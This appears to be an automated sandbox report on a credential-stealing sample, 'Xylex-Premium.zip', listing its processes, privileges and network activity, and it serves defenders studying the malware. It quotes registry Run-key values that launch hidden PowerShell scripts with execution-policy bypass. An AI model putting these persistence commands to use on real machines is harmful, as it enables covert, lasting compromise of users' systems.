Malware Analysis Report

2024-11-30 07:15

Sample ID: 240603-hffcgsfa7t
Target: Xylex-Premium.zip
SHA256: bd8a66310436b855871114e5b70f7936e51a0afd2d8d5ab77a1a9ded69dc9c9f
Tags: execution persistence spyware stealer
Score: 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score: 10/10

SHA256: bd8a66310436b855871114e5b70f7936e51a0afd2d8d5ab77a1a9ded69dc9c9f

Threat Level: Known bad

The file Xylex-Premium.zip was found to be: Known bad.

Malicious Activity Summary

execution persistence spyware stealer

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Reads user/profile data of web browsers

Loads dropped DLL

Executes dropped EXE

Looks up external IP address via web service

Adds Run key to start application

An obfuscated cmd.exe command-line is typically used to evade detection.

Launches sc.exe

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Enumerates processes with tasklist

Modifies registry key

Opens file in notepad (likely ransom note)

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Suspicious use of SendNotifyMessage

Detects videocard installed

Checks processor information in registry

Checks SCSI registry key(s)

Creates scheduled task(s)

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

Modifies registry class

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-06-03 06:40

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-06-03 06:40
Reported: 2024-06-03 06:51
Platform: win11-20240426-en
Max time kernel: 678s
Max time network: 679s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Executor\Xylex.bat"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\curl.exe N/A
N/A N/A C:\Windows\system32\curl.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Software\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Local\\Temp\\vsPkDgRTpOrbGuB.ps1\"" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Software\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Executor\\xylex.exe" | C:\Windows\system32\reg.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Software\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Roaming\\gJcMjZkbpUPtLad.ps1\"" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000\Software\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Executor\\xylex.exe" | C:\Windows\system32\reg.exe | N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

An obfuscated cmd.exe command-line is typically used to evade detection.

Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A

Checks processor information in registry

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\taskmgr.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\taskmgr.exe | N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Modifies registry class

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings | C:\Windows\system32\taskmgr.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\System32\NOTEPAD.EXE N/A
N/A N/A C:\Windows\System32\Notepad.exe N/A
N/A N/A C:\Windows\System32\Notepad.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4088 wrote to memory of 5088 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4088 wrote to memory of 5088 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 5088 wrote to memory of 2640 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe
PID 5088 wrote to memory of 2640 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe
PID 2640 wrote to memory of 1104 N/A C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe C:\Windows\system32\curl.exe
